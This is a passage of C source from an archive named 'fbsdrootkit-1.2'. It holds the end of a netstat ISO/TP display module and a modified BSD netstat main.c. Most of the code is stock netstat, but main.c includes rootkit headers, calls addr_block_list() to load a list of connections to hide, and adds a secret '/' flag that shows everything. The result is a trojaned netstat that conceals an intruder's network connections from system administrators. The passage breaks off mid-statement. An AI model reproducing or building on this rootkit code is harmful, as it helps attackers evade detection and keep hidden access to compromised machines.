struct tp_pcb tpcb; struct isopcb isopcb; struct socket sockb; union { struct sockaddr_iso siso; char data[128]; } laddr, faddr; #define kget(o, p) \ (kread((u_long)(o), (char *)&p, sizeof (p))) static int first = 1; /* * Print a summary of connections related to an Internet * protocol. For TP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. */ void iso_protopr(off, name) u_long off; char *name; { struct isopcb cb; register struct isopcb *prev, *next; if (off == 0) { printf("%s control block: symbol not in namelist\n", name); return; } if (strcmp(name, "tp") == 0) { tp_protopr(off, name); return; } if (kread(off, (char *)&cb, sizeof(cb))) return; isopcb = cb; prev = (struct isopcb *)off; if (isopcb.isop_next == (struct isopcb *)off) return; while (isopcb.isop_next != (struct isopcb *)off) { next = isopcb.isop_next; kget(next, isopcb); if (isopcb.isop_prev != prev) { printf("prev 0x%x next 0x%x isop_prev 0x%x isop_next 0x%x???\n", prev, next, isopcb.isop_prev, isopcb.isop_next); break; } kget(isopcb.isop_socket, sockb); iso_protopr1((u_long)next, 0); putchar('\n'); prev = next; } } void iso_protopr1(kern_addr, istp) u_long kern_addr; int istp; { if (first) { printf("Active ISO net connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } if (Aflag) printf("%8x ", (sockb.so_pcb ? (void *)sockb.so_pcb : (void *)kern_addr)); printf("%-5.5s %6d %6d ", "tp", sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); if (istp && tpcb.tp_lsuffixlen) { hexprint(tpcb.tp_lsuffixlen, tpcb.tp_lsuffix, "()"); printf("\t"); } else if (isopcb.isop_laddr == 0) printf("*.*\t"); else { if ((char *)isopcb.isop_laddr == ((char *)kern_addr) + _offsetof(struct isopcb, isop_sladdr)) laddr.siso = isopcb.isop_sladdr; else kget(isopcb.isop_laddr, laddr); isonetprint((struct sockaddr_iso *)&laddr, 1); } if (istp && tpcb.tp_fsuffixlen) { hexprint(tpcb.tp_fsuffixlen, tpcb.tp_fsuffix, "()"); printf("\t"); } else if (isopcb.isop_faddr == 0) printf("*.*\t"); else { if ((char *)isopcb.isop_faddr == ((char *)kern_addr) + _offsetof(struct isopcb, isop_sfaddr)) faddr.siso = isopcb.isop_sfaddr; else kget(isopcb.isop_faddr, faddr); isonetprint((struct sockaddr_iso *)&faddr, 0); } } void tp_protopr(off, name) u_long off; char *name; { extern char *tp_sstring[]; struct tp_ref *tpr, *tpr_base; struct tp_refinfo tpkerninfo; int size; kget(off, tpkerninfo); size = tpkerninfo.tpr_size * sizeof (*tpr); tpr_base = (struct tp_ref *)malloc(size); if (tpr_base == 0) return; kread((u_long)(tpkerninfo.tpr_base), (char *)tpr_base, size); for (tpr = tpr_base; tpr < tpr_base + tpkerninfo.tpr_size; tpr++) { if (tpr->tpr_pcb == 0) continue; kget(tpr->tpr_pcb, tpcb); if (tpcb.tp_state == ST_ERROR) printf("undefined tpcb state: 0x%x\n", tpr->tpr_pcb); if (!aflag && (tpcb.tp_state == TP_LISTENING || tpcb.tp_state == TP_CLOSED || tpcb.tp_state == TP_REFWAIT)) { continue; } kget(tpcb.tp_sock, sockb); if (tpcb.tp_npcb) switch(tpcb.tp_netservice) { case IN_CLNS: tp_inproto((u_long)tpkerninfo.tpr_base); break; default: kget(tpcb.tp_npcb, isopcb); iso_protopr1((u_long)tpcb.tp_npcb, 1); break; } if (tpcb.tp_state >= tp_NSTATES) printf(" %d", tpcb.tp_state); else printf(" %-12.12s", tp_sstring[tpcb.tp_state]); putchar('\n'); } } void tp_inproto(pcb) u_long pcb; { struct inpcb inpcb; kget(tpcb.tp_npcb, inpcb); if (!aflag && inet_lnaof(inpcb.inp_laddr) == INADDR_ANY) return; if (Aflag) printf("%8x ", pcb); printf("%-5.5s %6d %6d ", "tpip", sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); inetprint(&inpcb.inp_laddr, inpcb.inp_lport, "tp"); inetprint(&inpcb.inp_faddr, inpcb.inp_fport, "tp"); } /* * Pretty print an iso address (net address + port). * If the nflag was specified, use numbers instead of names. */ #ifdef notdef char * isonetname(iso) register struct iso_addr *iso; { struct sockaddr_iso sa; struct iso_hostent *ihe = 0; struct iso_hostent *iso_gethostentrybyaddr(); struct iso_hostent *iso_getserventrybytsel(); struct iso_hostent Ihe; static char line[80]; bzero(line, sizeof(line)); if( iso->isoa_afi ) { sa.siso_family = AF_ISO; sa.siso_addr = *iso; sa.siso_tsuffix = 0; if (!nflag ) ihe = iso_gethostentrybyaddr( &sa, 0, 0 ); if( ihe ) { Ihe = *ihe; ihe = &Ihe; sprintf(line, "%s", ihe->isoh_hname); } else { sprintf(line, "%s", iso_ntoa(iso)); } } else { sprintf(line, "*"); } return line; } static void isonetprint(iso, sufx, sufxlen, islocal) register struct iso_addr *iso; char *sufx; u_short sufxlen; int islocal; { struct iso_hostent *iso_getserventrybytsel(), *ihe; struct iso_hostent Ihe; char *line, *cp; int Alen = Aflag?18:22; line = isonetname(iso); cp = index(line, '\0'); ihe = (struct iso_hostent *)0; if( islocal ) islocal = 20; else islocal = 22 + Alen; if(Aflag) islocal += 10 ; if(!nflag) { if( (cp -line)>10 ) { cp = line+10; bzero(cp, sizeof(line)-10); } } *cp++ = '.'; if(sufxlen) { if( !Aflag && !nflag && (ihe=iso_getserventrybytsel(sufx, sufxlen))) { Ihe = *ihe; ihe = &Ihe; } if( ihe && (strlen(ihe->isoh_aname)>0) ) { sprintf(cp, "%s", ihe->isoh_aname); } else { iso_sprinttsel(cp, sufx, sufxlen); } } else sprintf(cp, "*"); /* fprintf(stdout, Aflag?" %-18.18s":" %-22.22s", line); */ if( strlen(line) > Alen ) { fprintf(stdout, " %s", line); fprintf(stdout, "\n %*.s", islocal+Alen," "); } else { fprintf(stdout, " %-*.*s", Alen, Alen,line); } } #endif #ifdef notdef static void x25_protopr(off, name) u_long off; char *name; { static char *xpcb_states[] = { "CLOSED", "LISTENING", "CLOSING", "CONNECTING", "ACKWAIT", "OPEN", }; register struct isopcb *prev, *next; struct x25_pcb xpcb; if (off == 0) { printf("%s control block: symbol not in namelist\n", name); return; } kread(off, &xpcb, sizeof (struct x25_pcb)); prev = (struct isopcb *)off; if (xpcb.x_next == (struct isopcb *)off) return; while (xpcb.x_next != (struct isopcb *)off) { next = isopcb.isop_next; kread((u_long)next, &xpcb, sizeof (struct x25_pcb)); if (xpcb.x_prev != prev) { printf("???\n"); break; } kread((u_long)xpcb.x_socket, &sockb, sizeof (sockb)); if (!aflag && xpcb.x_state == LISTENING || xpcb.x_state == TP_CLOSED ) { prev = next; continue; } if (first) { printf("Active X25 net connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } printf("%-5.5s %6d %6d ", name, sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); isonetprint(&xpcb.x_laddr.siso_addr, &xpcb.x_lport, sizeof(xpcb.x_lport), 1); isonetprint(&xpcb.x_faddr.siso_addr, &xpcb.x_fport, sizeof(xpcb.x_lport), 0); if (xpcb.x_state < 0 || xpcb.x_state >= x25_NSTATES) printf(" 0x0x0x0x0x0x0x0x0x%x", xpcb.x_state); else printf(" %-12.12s", xpcb_states[xpcb.x_state]); putchar('\n'); prev = next; } } #endif struct tp_stat tp_stat; void tp_stats(off, name) caddr_t off, name; { if (off == 0) { printf("TP not configured\n\n"); return; } printf("%s:\n", name); kget(off, tp_stat); tprintstat(&tp_stat, 8); } #define OUT stdout static void tprintstat(s, indent) register struct tp_stat *s; int indent; { fprintf(OUT, "%*sReceiving:\n",indent," "); fprintf(OUT, "\t%*s%d variable parameter%s ignored\n", indent," ", s->ts_param_ignored ,plural(s->ts_param_ignored)); fprintf(OUT, "\t%*s%d invalid parameter code%s\n", indent, " ", s->ts_inv_pcode ,plural(s->ts_inv_pcode)); fprintf(OUT, "\t%*s%d invalid parameter value%s\n", indent, " ", s->ts_inv_pval ,plural(s->ts_inv_pval)); fprintf(OUT, "\t%*s%d invalid dutype%s\n", indent, " ", s->ts_inv_dutype ,plural(s->ts_inv_dutype)); fprintf(OUT, "\t%*s%d negotiation failure%s\n", indent, " ", s->ts_negotfailed ,plural(s->ts_negotfailed)); fprintf(OUT, "\t%*s%d invalid destination reference%s\n", indent, " ", s->ts_inv_dref ,plural(s->ts_inv_dref)); fprintf(OUT, "\t%*s%d invalid suffix parameter%s\n", indent, " ", s->ts_inv_sufx ,plural(s->ts_inv_sufx)); fprintf(OUT, "\t%*s%d invalid length\n",indent, " ", s->ts_inv_length); fprintf(OUT, "\t%*s%d invalid checksum%s\n", indent, " ", s->ts_bad_csum ,plural(s->ts_bad_csum)); fprintf(OUT, "\t%*s%d DT%s out of order\n", indent, " ", s->ts_dt_ooo ,plural(s->ts_dt_ooo)); fprintf(OUT, "\t%*s%d DT%s not in window\n", indent, " ", s->ts_dt_niw ,plural(s->ts_dt_niw)); fprintf(OUT, "\t%*s%d duplicate DT%s\n", indent, " ", s->ts_dt_dup ,plural(s->ts_dt_dup)); fprintf(OUT, "\t%*s%d XPD%s not in window\n", indent, " ", s->ts_xpd_niw ,plural(s->ts_xpd_niw)); fprintf(OUT, "\t%*s%d XPD%s w/o credit to stash\n", indent, " ", s->ts_xpd_dup ,plural(s->ts_xpd_dup)); fprintf(OUT, "\t%*s%d time%s local credit reneged\n", indent, " ", s->ts_lcdt_reduced ,plural(s->ts_lcdt_reduced)); fprintf(OUT, "\t%*s%d concatenated TPDU%s\n", indent, " ", s->ts_concat_rcvd ,plural(s->ts_concat_rcvd)); fprintf(OUT, "%*sSending:\n", indent, " "); fprintf(OUT, "\t%*s%d XPD mark%s discarded\n", indent, " ", s->ts_xpdmark_del ,plural(s->ts_xpdmark_del)); fprintf(OUT, "\t%*sXPD stopped data flow %d time%s\n", indent, " ", s->ts_xpd_intheway ,plural(s->ts_xpd_intheway)); fprintf(OUT, "\t%*s%d time%s foreign window closed\n", indent, " ", s->ts_zfcdt ,plural(s->ts_zfcdt)); fprintf(OUT, "%*sMiscellaneous:\n", indent, " "); fprintf(OUT, "\t%*s%d small mbuf%s\n", indent, " ", s->ts_mb_small ,plural(s->ts_mb_small)); fprintf(OUT, "\t%*s%d cluster%s\n", indent, " ", s->ts_mb_cluster, plural(s->ts_mb_cluster)); fprintf(OUT, "\t%*s%d source quench \n",indent, " ", s->ts_quench); fprintf(OUT, "\t%*s%d dec bit%s\n", indent, " ", s->ts_rcvdecbit, plural(s->ts_rcvdecbit)); fprintf(OUT, "\t%*sM:L ( M mbuf chains of length L)\n", indent, " "); { register int j; fprintf(OUT, "\t%*s%d: over 16\n", indent, " ", s->ts_mb_len_distr[0]); for( j=1; j<=8; j++) { fprintf(OUT, "\t%*s%d: %d\t\t%d: %d\n", indent, " ", s->ts_mb_len_distr[j],j, s->ts_mb_len_distr[j<<1],j<<1 ); } } fprintf(OUT, "\t%*s%d EOT rcvd\n", indent, " ", s->ts_eot_input); fprintf(OUT, "\t%*s%d EOT sent\n", indent, " ", s->ts_EOT_sent); fprintf(OUT, "\t%*s%d EOT indication%s\n", indent, " ", s->ts_eot_user ,plural(s->ts_eot_user)); fprintf(OUT, "%*sConnections:\n", indent, " "); fprintf(OUT, "\t%*s%d connection%s used extended format\n", indent, " ", s->ts_xtd_fmt ,plural(s->ts_xtd_fmt)); fprintf(OUT, "\t%*s%d connection%s allowed transport expedited data\n", indent, " ", s->ts_use_txpd ,plural(s->ts_use_txpd)); fprintf(OUT, "\t%*s%d connection%s turned off checksumming\n", indent, " ", s->ts_csum_off ,plural(s->ts_csum_off)); fprintf(OUT, "\t%*s%d connection%s dropped due to retrans limit\n", indent, " ", s->ts_conn_gaveup ,plural(s->ts_conn_gaveup)); fprintf(OUT, "\t%*s%d tp 4 connection%s\n", indent, " ", s->ts_tp4_conn ,plural(s->ts_tp4_conn)); fprintf(OUT, "\t%*s%d tp 0 connection%s\n", indent, " ", s->ts_tp0_conn ,plural(s->ts_tp0_conn)); { register int j; static char *name[]= { "~LOCAL, PDN", "~LOCAL,~PDN", " LOCAL,~PDN", " LOCAL, PDN" }; fprintf(OUT, "\n%*sRound trip times, listed in ticks:\n", indent, " "); fprintf(OUT, "\t%*s%11.11s %12.12s | %12.12s | %s\n", indent, " ", "Category", "Smoothed avg", "Deviation", "Deviation/Avg"); for (j = 0; j <= 3; j++) { fprintf(OUT, "\t%*s%11.11s: %-11d | %-11d | %-11d | %-11d\n", indent, " ", name[j], s->ts_rtt[j], s->ts_rtt[j], s->ts_rtv[j], s->ts_rtv[j]); } } fprintf(OUT, "\n%*sTpdus RECVD [%d valid, %3.6f %% of total (%d); %d dropped]\n",indent," ", s->ts_tpdu_rcvd , ((s->ts_pkt_rcvd > 0) ? ((100 * (float)s->ts_tpdu_rcvd)/(float)s->ts_pkt_rcvd) : 0), s->ts_pkt_rcvd, s->ts_recv_drop ); fprintf(OUT, "\t%*sDT %6d AK %6d DR %4d CR %4d \n", indent, " ", s->ts_DT_rcvd, s->ts_AK_rcvd, s->ts_DR_rcvd, s->ts_CR_rcvd); fprintf(OUT, "\t%*sXPD %6d XAK %6d DC %4d CC %4d ER %4d\n", indent, " ", s->ts_XPD_rcvd, s->ts_XAK_rcvd, s->ts_DC_rcvd, s->ts_CC_rcvd, s->ts_ER_rcvd); fprintf(OUT, "\n%*sTpdus SENT [%d total, %d dropped]\n", indent, " ", s->ts_tpdu_sent, s->ts_send_drop); fprintf(OUT, "\t%*sDT %6d AK %6d DR %4d CR %4d \n", indent, " ", s->ts_DT_sent, s->ts_AK_sent, s->ts_DR_sent, s->ts_CR_sent); fprintf(OUT, "\t%*sXPD %6d XAK %6d DC %4d CC %4d ER %4d\n", indent, " ", s->ts_XPD_sent, s->ts_XAK_sent, s->ts_DC_sent, s->ts_CC_sent, s->ts_ER_sent); fprintf(OUT, "\n%*sRetransmissions:\n", indent, " "); #define PERCENT(X,Y) (((Y)>0)?((100 *(float)(X)) / (float) (Y)):0) fprintf(OUT, "\t%*sCR %6d CC %6d DR %6d \n", indent, " ", s->ts_retrans_cr, s->ts_retrans_cc, s->ts_retrans_dr); fprintf(OUT, "\t%*sDT %6d (%5.2f%%)\n", indent, " ", s->ts_retrans_dt, PERCENT(s->ts_retrans_dt, s->ts_DT_sent)); fprintf(OUT, "\t%*sXPD %6d (%5.2f%%)\n", indent, " ", s->ts_retrans_xpd, PERCENT(s->ts_retrans_xpd, s->ts_XPD_sent)); fprintf(OUT, "\n%*sE Timers: [%6d ticks]\n", indent, " ", s->ts_Eticks); fprintf(OUT, "%*s%6d timer%s set \t%6d timer%s expired \t%6d timer%s cancelled\n",indent, " ", s->ts_Eset ,plural(s->ts_Eset), s->ts_Eexpired ,plural(s->ts_Eexpired), s->ts_Ecan_act ,plural(s->ts_Ecan_act)); fprintf(OUT, "\n%*sC Timers: [%6d ticks]\n", indent, " ",s->ts_Cticks); fprintf(OUT, "%*s%6d timer%s set \t%6d timer%s expired \t%6d timer%s cancelled\n", indent, " ", s->ts_Cset ,plural(s->ts_Cset), s->ts_Cexpired ,plural(s->ts_Cexpired), s->ts_Ccan_act ,plural(s->ts_Ccan_act)); fprintf(OUT, "%*s%6d inactive timer%s cancelled\n", indent, " ", s->ts_Ccan_inact ,plural(s->ts_Ccan_inact)); fprintf(OUT, "\n%*sPathological debugging activity:\n", indent, " "); fprintf(OUT, "\t%*s%6d CC%s sent to zero dref\n", indent, " ", s->ts_zdebug ,plural(s->ts_zdebug)); /* SAME LINE AS ABOVE */ fprintf(OUT, "\t%*s%6d random DT%s dropped\n", indent, " ", s->ts_ydebug ,plural(s->ts_ydebug)); fprintf(OUT, "\t%*s%6d illegally large XPD TPDU%s\n", indent, " ", s->ts_vdebug ,plural(s->ts_vdebug)); fprintf(OUT, "\t%*s%6d faked reneging of cdt\n", indent, " ", s->ts_ldebug ); fprintf(OUT, "\n%*sACK reasons:\n", indent, " "); fprintf(OUT, "\t%*s%6d not acked immediately\n", indent, " ", s->ts_ackreason[_ACK_DONT_] ); fprintf(OUT, "\t%*s%6d strategy==each\n", indent, " ", s->ts_ackreason[_ACK_STRAT_EACH_] ); fprintf(OUT, "\t%*s%6d strategy==fullwindow\n", indent, " ", s->ts_ackreason[_ACK_STRAT_FULLWIN_] ); fprintf(OUT, "\t%*s%6d duplicate DT\n", indent, " ", s->ts_ackreason[_ACK_DUP_] ); fprintf(OUT, "\t%*s%6d EOTSDU\n", indent, " ", s->ts_ackreason[_ACK_EOT_] ); fprintf(OUT, "\t%*s%6d reordered DT\n", indent, " ", s->ts_ackreason[_ACK_REORDER_] ); fprintf(OUT, "\t%*s%6d user rcvd\n", indent, " ", s->ts_ackreason[_ACK_USRRCV_] ); fprintf(OUT, "\t%*s%6d fcc reqd\n", indent, " ", s->ts_ackreason[_ACK_FCC_] ); } #ifndef SSEL #define SSEL(s) ((s)->siso_tlen + TSEL(s)) #define PSEL(s) ((s)->siso_slen + SSEL(s)) #endif static void isonetprint(siso, islocal) register struct sockaddr_iso *siso; int islocal; { hexprint(siso->siso_nlen, siso->siso_addr.isoa_genaddr, "{}"); if (siso->siso_tlen || siso->siso_slen || siso->siso_plen) hexprint(siso->siso_tlen, TSEL(siso), "()"); if (siso->siso_slen || siso->siso_plen) hexprint(siso->siso_slen, SSEL(siso), "[]"); if (siso->siso_plen) hexprint(siso->siso_plen, PSEL(siso), "<>"); putchar(' '); } static char hexlist[] = "0123456789abcdef", obuf[128]; static void hexprint(n, buf, delim) int n; char *buf, *delim; { register u_char *in = (u_char *)buf, *top = in + n; register char *out = obuf; register int i; if (n == 0) return; while (in < top) { i = *in++; *out++ = '.'; if (i > 0xf) { out[1] = hexlist[i & 0xf]; i >>= 4; out[0] = hexlist[i]; out += 2; } else *out++ = hexlist[i]; } *obuf = *delim; *out++ = delim[1]; *out = 0; printf("%s", obuf); } fbsdrootkit-1.2/netstat/main.c100600 764 0 30122 6257601725 14246 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993\n\ Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)main.c 8.4 (Berkeley) 3/1/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" /* Rootkit configuration files */ #include "../config.h" #define MAIN_DOT_C #include "../rootkitnetstat.h" struct nlist nl[] = { #define N_MBSTAT 0 { "_mbstat" }, #define N_IPSTAT 1 { "_ipstat" }, #define N_TCB 2 { "_tcb" }, #define N_TCPSTAT 3 { "_tcpstat" }, #define N_UDB 4 { "_udb" }, #define N_UDPSTAT 5 { "_udpstat" }, #define N_IFNET 6 { "_ifnet" }, #define N_IMP 7 { "_imp_softc" }, #define N_ICMPSTAT 8 { "_icmpstat" }, #define N_RTSTAT 9 { "_rtstat" }, #define N_UNIXSW 10 { "_localsw" }, #define N_IDP 11 { "_nspcb"}, #define N_IDPSTAT 12 { "_idpstat"}, #define N_SPPSTAT 13 { "_spp_istat"}, #define N_NSERR 14 { "_ns_errstat"}, #define N_CLNPSTAT 15 { "_clnp_stat"}, #define IN_NOTUSED 16 { "_tp_inpcb" }, #define ISO_TP 17 { "_tp_refinfo" }, #define N_TPSTAT 18 { "_tp_stat" }, #define N_ESISSTAT 19 { "_esis_stat"}, #define N_NIMP 20 { "_nimp"}, #define N_RTREE 21 { "_rt_tables"}, #define N_CLTP 22 { "_cltb"}, #define N_CLTPSTAT 23 { "_cltpstat"}, #define N_NFILE 24 { "_nfile" }, #define N_FILE 25 { "_file" }, #define N_IGMPSTAT 26 { "_igmpstat" }, #define N_MRTPROTO 27 { "_ip_mrtproto" }, #define N_MRTSTAT 28 { "_mrtstat" }, #define N_MFCTABLE 29 { "_mfctable" }, #define N_VIFTABLE 30 { "_viftable" }, "", }; struct protox { u_char pr_index; /* index into nlist of cb head */ u_char pr_sindex; /* index into nlist of stat block */ u_char pr_wanted; /* 1 if wanted, 0 otherwise */ void (*pr_cblocks)(); /* control blocks printing routine */ void (*pr_stats)(); /* statistics printing routine */ char *pr_name; /* well-known name */ } protox[] = { { N_TCB, N_TCPSTAT, 1, protopr, tcp_stats, "tcp" }, { N_UDB, N_UDPSTAT, 1, protopr, udp_stats, "udp" }, { -1, N_IPSTAT, 1, 0, ip_stats, "ip" }, { -1, N_ICMPSTAT, 1, 0, icmp_stats, "icmp" }, { -1, N_IGMPSTAT, 1, 0, igmp_stats, "igmp" }, { -1, -1, 0, 0, 0, 0 } }; struct protox nsprotox[] = { { N_IDP, N_IDPSTAT, 1, nsprotopr, idp_stats, "idp" }, { N_IDP, N_SPPSTAT, 1, nsprotopr, spp_stats, "spp" }, { -1, N_NSERR, 1, 0, nserr_stats, "ns_err" }, { -1, -1, 0, 0, 0, 0 } }; struct protox isoprotox[] = { { ISO_TP, N_TPSTAT, 1, iso_protopr, tp_stats, "tp" }, { N_CLTP, N_CLTPSTAT, 1, iso_protopr, cltp_stats, "cltp" }, { -1, N_CLNPSTAT, 1, 0, clnp_stats, "clnp"}, { -1, N_ESISSTAT, 1, 0, esis_stats, "esis"}, { -1, -1, 0, 0, 0, 0 } }; struct protox *protoprotox[] = { protox, nsprotox, isoprotox, NULL }; static void printproto __P((struct protox *, char *)); static void usage __P((void)); static struct protox *name2protox __P((char *)); static struct protox *knownname __P((char *)); kvm_t *kvmd; int main(argc, argv) int argc; char *argv[]; { extern char *optarg; extern int optind; register struct protoent *p; register struct protox *tp; /* for printing cblocks & stats */ register char *cp; int ch; char *nlistf = NULL, *memf = NULL; char buf[_POSIX2_LINE_MAX]; char buf2[_POSIX2_LINE_MAX]; if (cp = rindex(argv[0], '/')) prog = cp + 1; else prog = argv[0]; af = AF_UNSPEC; #if defined(SHOWFLAG) while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:/")) != EOF) #else while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:")) != EOF) #endif switch(ch) { case 'A': Aflag = 1; break; case 'a': aflag = 1; break; case 'b': bflag = 1; break; case 'd': dflag = 1; break; case 'f': if (strcmp(optarg, "ns") == 0) af = AF_NS; else if (strcmp(optarg, "inet") == 0) af = AF_INET; else if (strcmp(optarg, "unix") == 0) af = AF_UNIX; else if (strcmp(optarg, "iso") == 0) af = AF_ISO; else { errx(1, "%s: unknown address family", optarg); } break; case 'g': gflag = 1; break; case 'I': { char *cp; iflag = 1; for (cp = interface = optarg; isalpha(*cp); cp++) continue; unit = atoi(cp); break; } case 'i': iflag = 1; break; case 'M': memf = optarg; break; case 'm': mflag = 1; break; case 'N': nlistf = optarg; break; case 'n': nflag = 1; break; case 'p': if ((tp = name2protox(optarg)) == NULL) { errx(1, "%s: unknown or uninstrumented protocol", optarg); } pflag = 1; break; case 'r': rflag = 1; break; case 's': ++sflag; break; case 't': tflag = 1; break; case 'u': af = AF_UNIX; break; case 'w': interval = atoi(optarg); iflag = 1; break; #if defined(SHOWFLAG) case '/': showall++; break; #endif case '?': default: usage(); } argv += optind; argc -= optind; #define BACKWARD_COMPATIBILITY #ifdef BACKWARD_COMPATIBILITY if (*argv) { if (isdigit(**argv)) { interval = atoi(*argv); if (interval <= 0) usage(); ++argv; iflag = 1; } if (*argv) { nlistf = *argv; if (*++argv) memf = *argv; } } #endif /* Read in a list of connections to block */ if(!showall) addr_block_list(); /* * Discard setgid privileges if not the running kernel so that bad * guys can't print interesting stuff from kernel memory. */ if (nlistf != NULL || memf != NULL) setgid(getgid()); kvmd = kvm_openfiles(nlistf, memf, NULL, O_RDONLY, buf); if (kvmd == NULL) { errx(1, "kvm_open: %s", buf); } if (kvm_nlist(kvmd, nl) < 0) { if(nlistf) errx(1, "%s: kvm_nlist: %s", nlistf, kvm_geterr(kvmd)); else errx(1, "kvm_nlist: %s", kvm_geterr(kvmd)); } if (nl[0].n_type == 0) { if(nlistf) errx(1, "%s: no namelist", nlistf); else errx(1, "no namelist"); } if (mflag) { mbpr(nl[N_MBSTAT].n_value); exit(0); } if (pflag) { if (tp->pr_stats) (*tp->pr_stats)(nl[tp->pr_sindex].n_value, tp->pr_name); else printf("%s: no stats routine\n", tp->pr_name); exit(0); } #if 0 /* * Keep file descriptors open to avoid overhead * of open/close on each call to get* routines. */ sethostent(1); setnetent(1); #else /* * This does not make sense any more with DNS being default over * the files. Doing a setXXXXent(1) causes a tcp connection to be * used for the queries, which is slower. */ #endif if (iflag) { intpr(interval, nl[N_IFNET].n_value); exit(0); } if (rflag) { if (sflag) rt_stats(nl[N_RTSTAT].n_value); else routepr(nl[N_RTREE].n_value); exit(0); } if (gflag) { if (sflag) mrt_stats(nl[N_MRTPROTO].n_value, nl[N_MRTSTAT].n_value); else mroutepr(nl[N_MRTPROTO].n_value, nl[N_MFCTABLE].n_value, nl[N_VIFTABLE].n_value); exit(0); } if (af == AF_INET || af == AF_UNSPEC) { setprotoent(1); setservent(1); /* ugh, this is O(MN) ... why do we do this? */ while (p = getprotoent()) { for (tp = protox; tp->pr_name; tp++) if (strcmp(tp->pr_name, p->p_name) == 0) break; if (tp->pr_name == 0 || tp->pr_wanted == 0) continue; printproto(tp, p->p_name); } endprotoent(); } if (af == AF_NS || af == AF_UNSPEC) for (tp = nsprotox; tp->pr_name; tp++) printproto(tp, tp->pr_name); if (af == AF_ISO || af == AF_UNSPEC) for (tp = isoprotox; tp->pr_name; tp++) printproto(tp, tp->pr_name); if ((af == AF_UNIX || af == AF_UNSPEC) && !sflag) unixpr(nl[N_UNIXSW].n_value); exit(0); } /* * Print out protocol statistics or control blocks (per sflag). * If the interface was not specifically requested, and the symbol * is not in the namelist, ignore this one. */ static void printproto(tp, name) register struct protox *tp; char *name; { void (*pr)(); u_long off; if (sflag) { pr = tp->pr_stats; off = nl[tp->pr_sindex].n_value; } else { pr = tp->pr_cblocks; off = nl[tp->pr_index].n_value; } if (pr != NULL && (off || af != AF_UNSPEC)) (*pr)(off, name); } /* * Read kernel memory, return 0 on success. */ int kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) { warnx("%s", kvm_geterr(kvmd)); return (-1); } return (0); } char * plural(n) int n; { return (n != 1 ? "s" : ""); } char * plurales(n) int n; { return (n != 1 ? "es" : ""); } /* * Find the protox for the given "well-known" name. */ static struct protox * knownname(name) char *name; { struct protox **tpp, *tp; for (tpp = protoprotox; *tpp; tpp++) for (tp = *tpp; tp->pr_name; tp++) if (strcmp(tp->pr_name, name) == 0) return (tp); return (NULL); } /* * Find the protox corresponding to name. */ static struct protox * name2protox(name) char *name; { struct protox *tp; char **alias; /* alias from p->aliases */ struct protoent *p; /* * Try to find the name in the list of "well-known" names. If that * fails, check if name is an alias for an Internet protocol. */ if (tp = knownname(name)) return (tp); setprotoent(1); /* make protocol lookup cheaper */ while (p = getprotoent()) { /* assert: name not same as p->name */ for (alias = p->p_aliases; *alias; alias++) if (strcmp(name, *alias) == 0) { endprotoent(); return (knownname(p->p_name)); } } endprotoent(); return (NULL); } static void usage() { (void)fprintf(stderr, "usage: %s [-Aan] [-f address_family] [-M core] [-N system]\n", prog); (void)fprintf(stderr, " %s [-bdghimnrs] [-f address_family] [-M core] [-N system]\n", prog); (void)fprintf(stderr, " %s [-bdn] [-I interface] [-M core] [-N system] [-w wait]\n", prog); (void)fprintf(stderr, " %s [-M core] [-N system] [-p protocol]\n", prog); exit(1); } void trimdomain(cp) char *cp; { static char domain[MAXHOSTNAMELEN + 1]; static int first = 1; char *s; if (first) { first = 0; if (gethostname(domain, MAXHOSTNAMELEN) == 0 && (s = strchr(domain, '.'))) (void) strcpy(domain, s + 1); else domain[0] = 0; } if 